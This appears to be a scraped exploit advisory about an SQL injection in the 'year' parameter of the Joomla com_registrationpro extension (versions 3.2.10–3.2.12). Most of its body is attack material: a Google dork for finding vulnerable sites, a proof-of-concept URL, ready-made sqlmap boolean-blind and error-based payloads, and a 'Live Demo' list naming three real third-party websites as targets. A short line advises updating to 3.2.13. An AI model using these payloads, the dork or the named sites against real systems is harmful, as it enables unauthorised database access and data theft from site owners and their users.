Joomla com_registrationpro SQL injection Vulnerability

2016.08.11
mr xBADGIRL21 (MR) mr
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

###################### # ____ _ ____ ____ ___ ____ _ ____ _ # __ _| __ ) / | _ / ___|_ _| _ | | |___ / | # / / _ / _ | | | | | _ | || |_) | | __) | | # > <| |_) / ___ | |_| | |_| || || _ <| |___ / __/| | # /_/_____/_/ _____/ ____|___|_| ______|_____|_| # ###################### # Exploit Title : Joomla com_registrationpro SQL injection Vulnerability # Exploit Author : xBADGIRL21 # Dork : inurl:index.php?option=com_registrationpro # Vendor Homepage : http://www.joomlashowroom.com/ # version : 3.2.12 - 3.2.10 # Tested on: [ BACKBOX] # skype:xbadgirl21 # Date: 10/08/2016 # video Proof : https://www.youtube.com/watch?v=GcEQMd7Dvl4 ###################### # [+] DESCRIPTION : ###################### # [+] Event Registration Pro is a Joomla extension for accepting online registrations and payments for events # [+] training classes, conferences, and seminars. # [+] AND an SQL injection has been Detected in this Joomla components registrationpro ###################### # [+] Poc : ###################### # [year] Get Parameter Vulnerable To SQLi # http://127.0.0.1/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021' ###################### # [+] SQLmap PoC: ###################### # Parameter: year (GET) # Type: boolean-based blind # Title: MySQL >= 5.0 boolean-based blind - Parameter replace # Payload: option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=(SELECT (CASE WHEN (5274=5274) THEN 5274 ELSE 5274*(SELECT 5274 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) # # Type: error-based # Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause # Payload: option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021 AND (SELECT 8657 FROM(SELECT #COUNT(*),CONCAT(0x71767a7171,(SELECT (ELT(8657=8657,1))),0x71786b7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) # --- # GET parameter 'year' is vulnerable. Do you want to keep testing the others (if any)? [y/N] ###################### # [!] Live Demo : ###################### http://www.k-noe.fr/achats/fr/registration/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021 http://gallery7theatre.com/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021 http://advancedbrain.com/index.php?option=com_registrationpro&view=calendar&Itemid=27&listview=2&month=6&year=2021 ###################### # Solution ###################### # Just Update to the Last Version =00=> Version #: [ 3.2.13 ] ###################### # Discovered by : xBADGIRL21 # Greetz : All Mauritanien Hackers - NoWhere ######################

References:

https://www.youtube.com/watch?v=GcEQMd7Dvl4


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top